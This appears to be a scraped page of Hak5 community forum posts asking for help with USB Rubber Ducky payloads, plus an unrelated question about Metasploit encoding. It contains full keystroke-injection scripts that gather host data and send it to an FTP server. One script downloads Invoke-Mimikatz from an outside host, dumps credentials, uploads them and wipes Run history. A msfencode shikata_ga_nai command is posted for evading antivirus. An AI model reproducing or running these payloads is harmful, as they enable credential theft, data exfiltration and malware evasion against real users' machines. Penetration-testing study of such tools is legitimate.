Search the Community

Wrote a ducky script to capture Computer Name, Username, IP address and Current Time stamp through a Powershell script. Never works the way I want after encoding it and using the BIN file. The RUN window never opens and nor does notepad. It randomly opens some excel file on the desktop and writes the STRING values there. The powershell commands at the end of the script seem to executed fine in the RUN window, but since the PS1 file is never created using notepad, they are useless. I feel it might have to do something with the encoding - I've tried GB and US (my keyboard layout is US). I have verified that the powershell script works otherwise. For encoding, I have tried both - encoder on DUCKTOOLKIT site as well as the local JAR encoder. I have also tried with all DELAYs more than 1000. Need help in figuring out what's going wrong? NOTE: the username, password and server were replaced with correct values in the actual script. Successfully verified the PS script. Ducky Script - DELAY 500 GUI R DELAY 500 STRING notepad DELAY 500 ENTER DELAY 1000 STRING $username = $env:username ENTER STRING $computername = $env:computername ENTER STRING $ipaddress = ([System.Net.DNS]::GetHostAddresses($env:computername) | Where-Object {$_.AddressFamily -eq "InterNetwork"} | select-object IPAddressToString)[0].IPAddressToString ENTER STRING $timestamp = (get-date).ToString('d-M-y HH:mm:ss') ENTER STRING $File = "C:\Users\$username\$computername.txt" ENTER STRING "Computername: $computername" >> $File ENTER STRING "Username: $username" >> $File ENTER STRING "IP-Address: $ipaddress" >> $File ENTER STRING "Time: $timestamp" >> $File ENTER STRING "`n" >> $File ENTER STRING $ftp = "ftp://username:password@server/Ducky/$computername.txt" ENTER STRING $webclient = New-Object System.Net.WebClient ENTER STRING $uri = New-Object System.Uri($ftp) ENTER STRING $webclient.UploadFile($uri, $File) ENTER STRING $wshell = New-Object -ComObject Wscript.Shell ENTER STRING $wshell.Popup("Bazinga",0,"OOPS",0x1) DELAY 3000 CTRL s DELAY 1000 STRING %TEMP%\cache.ps1 TAB DELAY 1000 DOWNARROW DOWNARROW DELAY 2000 ENTER ALT s DELAY 1000 ALT F4 DELAY 1000 GUI r DELAY 500 STRING powershell Start-Process cmd -Verb runAs ENTER DELAY 500 ALT y DELAY 500 STRING powershell Set-ExecutionPolicy 'Unrestricted' -Scope CurrentUser -Confirm:$false ENTER DELAY 500 STRING powershell.exe -windowstyle hidden -File %TEMP%\cache.ps1 ENTER

This is what the rubber ducky is outputting to my CMD window: Notice that @ signs have been subbed for " marks. I've tried changing the language from GB to US, but that doesn't seem to help either powershell @IEX (New-Object Net.WebClient).DownloadString('http://someplace.com/im.ps1'); $output = Invoke-Mimikatz -DumpCreds; (New-Object Net.WebClient).UploadString('https://someplace.com/rx.php', $output)@ Here's the contents of the file that I pass to ducktools (python.exe ducktools.py -e -l us mimi.txt inject1.bin) to get my inject.bin file Any help would be greatly appreciated! Mimi.txt file contents: REM Title: Invoke mimikatz and send creds to remote server REM Author: Hak5Darren Props: Mubix, Clymb3r, Gentilkiwi DELAY 1000 REM Open an admin command prompt GUI r DELAY 500 STRING powershell Start-Process cmd -Verb runAs ENTER DELAY 2000 ALT y DELAY 1000 REM Obfuscate the command prompt REM STRING mode con:cols=18 lines=1 ENTER REM STRING color FE ENTER REM Download and execute Invoke Mimikatz then upload the results STRING powershell "IEX (New-Object Net.WebClient).DownloadString('http://someplace.com/im.ps1'); $output = Invoke-Mimikatz -DumpCreds; (New-Object Net.WebClient).UploadString('https://someplace.com/rx.php', $output)" ENTER DELAY 15000 REM Clear the Run history and exit STRING powershell Remove-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU' -Name '*' -ErrorAction SilentlyContinue ENTER STRING exit ENTER

So the pineapple has an APP in the android market. Anyone thought of making an app for the Ducky? Would be nice to be able to flash and adjust payloads on the go with an android device. Select the payloads through the app, dl them to our android device and flash them to the duck at will. Could also have a live editor to compile our own payloads. 1. could android flash the duck? / drivers out there for it? 2. anyone want to write the app? -thought process here is that we are mobile most of the time. half or our gear is ready to go. Using our mobile device vs a computer would make more sense to me to be less visible when it comes down to blending in on a pen test. Don't have to stop there, could be all the Hak5 tools wrapped into one app that have an interface. Lan turtle, etc. --- anyone? --- thoughts?

I am in Australia and using a US Keyboard as is standard here, and I encode using ducky encoder with the US keyboard. The problem is that when i first insert the ducky it runs the script but types really random functions and does nothing related to the code. However, when i then press the replay button on the ducky, it works fine and will continue to work correctly no matter how many times i press it. Thoughts?

Dear friends, I write some program with Microsoft Visual C# and .NET. i want to encode this program...so i use the more crypts tools....but i have not a good result. the Antivirus are all times catch it.so finally i use the shikata_ga_nai tool. yes it is working well. The all antivirus are bypassing well.that's my command....... sudo cat /root/Desktop/test1.exe | msfencode -c 1 -e x86/shikata_ga_nai > /test2.exe but problem is : The program is not working........ I try is windows XP 32 bit and 64 bit OS.....but same problem...... The error massage is: " Program too big to fit into memory " how to fix this problems? that problem only with shikata_ga_nai tool......plz help me.....